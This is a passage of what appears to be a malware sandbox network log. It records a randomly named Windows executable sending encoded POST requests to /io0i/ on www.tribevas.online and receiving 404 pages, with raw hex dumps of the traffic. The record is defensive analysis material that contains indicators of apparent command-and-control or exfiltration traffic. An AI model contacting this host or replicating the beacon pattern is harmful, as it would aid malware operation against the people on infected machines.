Oct 7, 2024 11:52:55.704905987 CEST	1289	IN	HTTP/1.1 200 OK date: Mon, 07 Oct 2024 09:52:54 GMT content-type: text/html; charset=utf-8 content-length: 1478 x-request-id: 6f5c0c8e-9493-4e52-af2d-68b7294b514d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vTBVg7G9vjL8eNSs+Maj7zHw1x1rCxDoWRJI3EzN4coTI39XWCmubJorbXMmjGCxp8YH85XIX28KDFrkRCxOog== set-cookie: parking_session=6f5c0c8e-9493-4e52-af2d-68b7294b514d; expires=Mon, 07 Oct 2024 10:07:55 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 54 42 56 67 37 47 39 76 6a 4c 38 65 4e 53 73 2b 4d 61 6a 37 7a 48 77 31 78 31 72 43 78 44 6f 57 52 4a 49 33 45 7a 4e 34 63 6f 54 49 33 39 58 57 43 6d 75 62 4a 6f 72 62 58 4d 6d 6a 47 43 78 70 38 59 48 38 35 58 49 58 32 38 4b 44 46 72 6b 52 43 78 4f 6f 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vTBVg7G9vjL8eNSs+Maj7zHw1x1rCxDoWRJI3EzN4coTI39XWCmubJorbXMmjGCxp8YH85XIX28KDFrkRCxOog==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 7, 2024 11:52:55.705003023 CEST	878	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmY1YzBjOGUtOTQ5My00ZTUyLWFmMmQtNjhiNzI5NGI1MTRkIiwicGFnZV90aW1lIjoxNzI4Mjk0Nzc1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub25saW5lLWRhdGluZzI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.30	49790	184.94.215.26	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:01.130692959 CEST	665	OUT	POST /io0i/ HTTP/1.1 Host: www.tribevas.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.tribevas.online Referer: http://www.tribevas.online/io0i/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 66 42 4b 35 74 72 6f 32 6e 36 6c 6a 47 47 37 32 71 39 4a 57 6a 31 55 7a 53 79 50 52 46 57 4a 56 4d 58 71 4c 35 5a 4e 38 76 64 4f 68 79 62 45 46 2f 45 7a 4d 68 72 69 2f 33 6c 4d 4a 37 75 49 34 34 78 4e 43 2b 39 48 68 36 44 6c 72 59 65 71 44 65 56 61 63 34 30 70 63 35 35 41 4b 69 4c 61 43 42 4d 6e 39 58 4c 50 4c 77 69 2b 5a 78 6b 78 75 69 4b 31 6c 4b 39 69 76 47 50 39 72 4e 65 2f 50 71 6d 53 6b 74 4e 73 77 4f 34 5a 58 74 56 4c 44 4c 57 37 73 4c 31 32 4c 4f 4e 68 6a 72 56 4a 6e 52 2f 4a 44 6b 7a 2b 61 77 45 55 59 46 4f 71 70 34 6a 55 48 4a 32 43 39 6c 43 45 6a 4d 39 37 54 72 41 3d 3d Data Ascii: VzK4o8Jx=fBK5tro2n6ljGG72q9JWj1UzSyPRFWJVMXqL5ZN8vdOhybEF/EzMhri/3lMJ7uI44xNC+9Hh6DlrYeqDeVac40pc55AKiLaCBMn9XLPLwi+ZxkxuiK1lK9ivGP9rNe/PqmSktNswO4ZXtVLDLW7sL12LONhjrVJnR/JDkz+awEUYFOqp4jUHJ2C9lCEjM97TrA==
Oct 7, 2024 11:53:01.303680897 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:01 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 13840 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
Oct 7, 2024 11:53:01.303705931 CEST	1289	IN	Data Raw: 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a Data Ascii: : rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.pat
Oct 7, 2024 11:53:01.303719044 CEST	1289	IN	Data Raw: 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31 30 37 20 32 2e 31 38 32 2d 31 32 2e 34 31 20 36 2e 36 34 32 2d 31 36 2e 35 37 37 20 39 2e 30 37 32 2d 38 2e 34 37 34 20 32 31 2e 32 Data Ascii: 01.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-
Oct 7, 2024 11:53:01.303888083 CEST	1289	IN	Data Raw: 32 30 34 2d 37 32 2e 34 34 36 2d 34 2e 30 35 37 2d 32 38 2e 34 30 32 2d 2e 38 35 34 2d 34 39 2e 38 37 32 2d 31 2e 39 36 38 2d 36 32 2e 31 34 20 34 2e 30 35 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 Data Ascii: 204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.55
Oct 7, 2024 11:53:01.303940058 CEST	1289	IN	Data Raw: 33 20 37 2e 32 2d 34 39 2e 34 33 34 20 37 2e 37 36 2d 32 31 2e 39 30 34 2e 35 36 2d 33 38 2e 36 30 34 20 31 2e 30 31 32 2d 34 39 2e 38 34 33 2d 2e 34 36 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 Data Ascii: 3 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238
Oct 7, 2024 11:53:01.304200888 CEST	1289	IN	Data Raw: 36 2d 2e 35 31 33 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35 39 32 2e 34 32 32 2d 31 2e 33 34 2e 35 31 37 2d 32 2e 30 34 37 2e 30 38 32 2d 2e 35 39 38 2d 2e 32 35 33 2d 2e 39 32 31 2d Data Ascii: 6-.513 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.205.78-.4M51.58 3.028c-.54-.1-.912.074-1.39
Oct 7, 2024 11:53:01.304250956 CEST	1289	IN	Data Raw: 31 2e 31 33 2e 37 38 35 2e 31 34 34 2e 30 36 35 2d 2e 35 33 38 2e 32 32 2d 31 2e 30 34 31 2e 32 30 33 2d 31 2e 36 31 32 2d 2e 30 31 36 2d 2e 35 32 38 2d 2e 32 33 38 2d 2e 38 32 2d 2e 34 36 35 2d 2e 37 30 36 4d 31 35 2e 39 34 36 20 32 31 2e 32 30 Data Ascii: 1.13.785.144.065-.538.22-1.041.203-1.612-.016-.528-.238-.82-.465-.706M15.946 21.201c-.04-.142-.134-.197-.214-.2-.311-.02-.464.621-.576 1.05-.124.468-.188.945-.14 1.461.053.562.486.699.57.088.053-.375.146-.754.233-1.107.108-.439.265-.815.127-1.
Oct 7, 2024 11:53:01.304264069 CEST	1289	IN	Data Raw: 39 2d 2e 30 38 32 20 32 2e 30 35 33 2d 2e 31 34 2e 34 36 38 2d 2e 30 34 20 31 2e 33 35 2e 32 35 33 20 31 2e 35 31 36 2d 2e 31 36 34 2e 31 39 31 2d 2e 34 38 33 2d 2e 39 30 36 2d 2e 37 2d 31 2e 35 38 33 2d 2e 36 38 35 4d 38 31 2e 39 35 38 20 31 34 Data Ascii: 9-.082 2.053-.14.468-.04 1.35.253 1.516-.164.191-.483-.906-.7-1.583-.685M81.958 14.767c-.103-.44-.306-.8-.377-1.279-.095-.644-.518-.678-.57.063-.07.998.19 1.845.53 2.34.293.426.566-.494.417-1.124M99.918 9.365c-.177-.18-.36-.23-.56-.337-.295-.1
Oct 7, 2024 11:53:01.304322004 CEST	1289	IN	Data Raw: 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33 2e 32 35 36 2d 2e 34 34 36 2e 34 32 2d 2e 31 30 38 2e 31 35 36 2d 2e 31 37 34 2e 33 34 2d Data Ascii: .71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1.907-1.188-1.284M97.93 18.019c
Oct 7, 2024 11:53:01.304374933 CEST	1289	IN	Data Raw: 33 33 22 20 64 3d 22 4d 35 31 2e 39 37 36 20 33 32 2e 35 30 35 63 2e 32 37 20 32 2e 37 34 38 2d 31 2e 37 33 35 20 35 2e 31 39 37 2d 34 2e 34 37 36 20 35 2e 34 37 2d 32 2e 37 34 38 2e 32 37 34 2d 35 2e 31 39 39 2d 31 2e 37 33 32 2d 35 2e 34 37 36 Data Ascii: 33" d="M51.976 32.505c.27 2.748-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.976 28.505c.27 2.748-1.735 5.197-4.483 5.47-2.748.273-5.192-1.733-5.469-4.48-.27-2.74
Oct 7, 2024 11:53:01.304652929 CEST	1158	IN	Data Raw: 22 4d 31 35 2e 37 38 39 20 34 2e 36 33 32 4c 31 35 2e 37 38 39 20 30 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 30 20 2d 31 20 2d 31 20 30 20 33 31 38 20 31 37 30 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a Data Ascii: "M15.789 4.632L15.789 0" transform="matrix(0 -1 -1 0 318 170)"/> </g> <path fill="#4B4B62" class="path" fill-rule="nonzero" stroke="#4B4B62" stroke-width="2" d="M198.754 186c1.56 0 2.246-.703 2.246-2.3v-41.4c0-1.597-.6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.30	49791	184.94.215.26	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:03.834153891 CEST	685	OUT	POST /io0i/ HTTP/1.1 Host: www.tribevas.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.tribevas.online Referer: http://www.tribevas.online/io0i/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 66 42 4b 35 74 72 6f 32 6e 36 6c 6a 46 69 2f 32 73 62 42 57 30 6c 55 77 64 53 50 52 4d 32 4a 5a 4d 58 75 4c 35 59 59 6a 76 76 36 68 78 2b 67 46 2b 46 7a 4d 74 4c 69 2f 38 46 4d 49 78 4f 49 4a 34 78 41 39 2b 39 37 68 36 43 42 72 59 63 79 44 65 6d 79 54 71 55 70 65 78 5a 41 62 73 72 61 43 42 4d 6e 39 58 4c 7a 68 77 6d 53 5a 77 52 35 75 74 4c 31 6b 57 74 69 75 42 50 39 72 41 2b 2f 4c 71 6d 53 53 74 4d 68 6c 4f 37 78 58 74 58 54 44 4c 6a 50 6a 41 31 32 4e 44 74 67 77 69 41 68 33 63 2f 78 72 68 79 57 35 70 33 63 50 41 5a 62 7a 6c 67 67 46 61 57 2b 51 35 44 70 4c 4f 2f 36 49 32 42 77 69 36 5a 6e 6d 47 6b 36 78 41 4f 51 6d 36 67 67 68 32 77 45 3d Data Ascii: VzK4o8Jx=fBK5tro2n6ljFi/2sbBW0lUwdSPRM2JZMXuL5YYjvv6hx+gF+FzMtLi/8FMIxOIJ4xA9+97h6CBrYcyDemyTqUpexZAbsraCBMn9XLzhwmSZwR5utL1kWtiuBP9rA+/LqmSStMhlO7xXtXTDLjPjA12NDtgwiAh3c/xrhyW5p3cPAZbzlggFaW+Q5DpLO/6I2Bwi6ZnmGk6xAOQm6ggh2wE=
Oct 7, 2024 11:53:04.007240057 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:03 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 13840 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
Oct 7, 2024 11:53:04.007286072 CEST	1289	IN	Data Raw: 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a Data Ascii: : rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.pat
Oct 7, 2024 11:53:04.007298946 CEST	1289	IN	Data Raw: 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31 30 37 20 32 2e 31 38 32 2d 31 32 2e 34 31 20 36 2e 36 34 32 2d 31 36 2e 35 37 37 20 39 2e 30 37 32 2d 38 2e 34 37 34 20 32 31 2e 32 Data Ascii: 01.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-
Oct 7, 2024 11:53:04.007309914 CEST	1289	IN	Data Raw: 32 30 34 2d 37 32 2e 34 34 36 2d 34 2e 30 35 37 2d 32 38 2e 34 30 32 2d 2e 38 35 34 2d 34 39 2e 38 37 32 2d 31 2e 39 36 38 2d 36 32 2e 31 34 20 34 2e 30 35 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 Data Ascii: 204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.55
Oct 7, 2024 11:53:04.007322073 CEST	1289	IN	Data Raw: 33 20 37 2e 32 2d 34 39 2e 34 33 34 20 37 2e 37 36 2d 32 31 2e 39 30 34 2e 35 36 2d 33 38 2e 36 30 34 20 31 2e 30 31 32 2d 34 39 2e 38 34 33 2d 2e 34 36 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 Data Ascii: 3 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238
Oct 7, 2024 11:53:04.007349014 CEST	1289	IN	Data Raw: 36 2d 2e 35 31 33 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35 39 32 2e 34 32 32 2d 31 2e 33 34 2e 35 31 37 2d 32 2e 30 34 37 2e 30 38 32 2d 2e 35 39 38 2d 2e 32 35 33 2d 2e 39 32 31 2d Data Ascii: 6-.513 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.205.78-.4M51.58 3.028c-.54-.1-.912.074-1.39
Oct 7, 2024 11:53:04.007879019 CEST	1289	IN	Data Raw: 31 2e 31 33 2e 37 38 35 2e 31 34 34 2e 30 36 35 2d 2e 35 33 38 2e 32 32 2d 31 2e 30 34 31 2e 32 30 33 2d 31 2e 36 31 32 2d 2e 30 31 36 2d 2e 35 32 38 2d 2e 32 33 38 2d 2e 38 32 2d 2e 34 36 35 2d 2e 37 30 36 4d 31 35 2e 39 34 36 20 32 31 2e 32 30 Data Ascii: 1.13.785.144.065-.538.22-1.041.203-1.612-.016-.528-.238-.82-.465-.706M15.946 21.201c-.04-.142-.134-.197-.214-.2-.311-.02-.464.621-.576 1.05-.124.468-.188.945-.14 1.461.053.562.486.699.57.088.053-.375.146-.754.233-1.107.108-.439.265-.815.127-1.
Oct 7, 2024 11:53:04.007932901 CEST	1289	IN	Data Raw: 39 2d 2e 30 38 32 20 32 2e 30 35 33 2d 2e 31 34 2e 34 36 38 2d 2e 30 34 20 31 2e 33 35 2e 32 35 33 20 31 2e 35 31 36 2d 2e 31 36 34 2e 31 39 31 2d 2e 34 38 33 2d 2e 39 30 36 2d 2e 37 2d 31 2e 35 38 33 2d 2e 36 38 35 4d 38 31 2e 39 35 38 20 31 34 Data Ascii: 9-.082 2.053-.14.468-.04 1.35.253 1.516-.164.191-.483-.906-.7-1.583-.685M81.958 14.767c-.103-.44-.306-.8-.377-1.279-.095-.644-.518-.678-.57.063-.07.998.19 1.845.53 2.34.293.426.566-.494.417-1.124M99.918 9.365c-.177-.18-.36-.23-.56-.337-.295-.1
Oct 7, 2024 11:53:04.007945061 CEST	1289	IN	Data Raw: 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33 2e 32 35 36 2d 2e 34 34 36 2e 34 32 2d 2e 31 30 38 2e 31 35 36 2d 2e 31 37 34 2e 33 34 2d Data Ascii: .71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1.907-1.188-1.284M97.93 18.019c
Oct 7, 2024 11:53:04.007956028 CEST	1289	IN	Data Raw: 33 33 22 20 64 3d 22 4d 35 31 2e 39 37 36 20 33 32 2e 35 30 35 63 2e 32 37 20 32 2e 37 34 38 2d 31 2e 37 33 35 20 35 2e 31 39 37 2d 34 2e 34 37 36 20 35 2e 34 37 2d 32 2e 37 34 38 2e 32 37 34 2d 35 2e 31 39 39 2d 31 2e 37 33 32 2d 35 2e 34 37 36 Data Ascii: 33" d="M51.976 32.505c.27 2.748-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.976 28.505c.27 2.748-1.735 5.197-4.483 5.47-2.748.273-5.192-1.733-5.469-4.48-.27-2.74
Oct 7, 2024 11:53:04.007967949 CEST	1158	IN	Data Raw: 22 4d 31 35 2e 37 38 39 20 34 2e 36 33 32 4c 31 35 2e 37 38 39 20 30 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 30 20 2d 31 20 2d 31 20 30 20 33 31 38 20 31 37 30 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a Data Ascii: "M15.789 4.632L15.789 0" transform="matrix(0 -1 -1 0 318 170)"/> </g> <path fill="#4B4B62" class="path" fill-rule="nonzero" stroke="#4B4B62" stroke-width="2" d="M198.754 186c1.56 0 2.246-.703 2.246-2.3v-41.4c0-1.597-.6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.30	49792	184.94.215.26	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
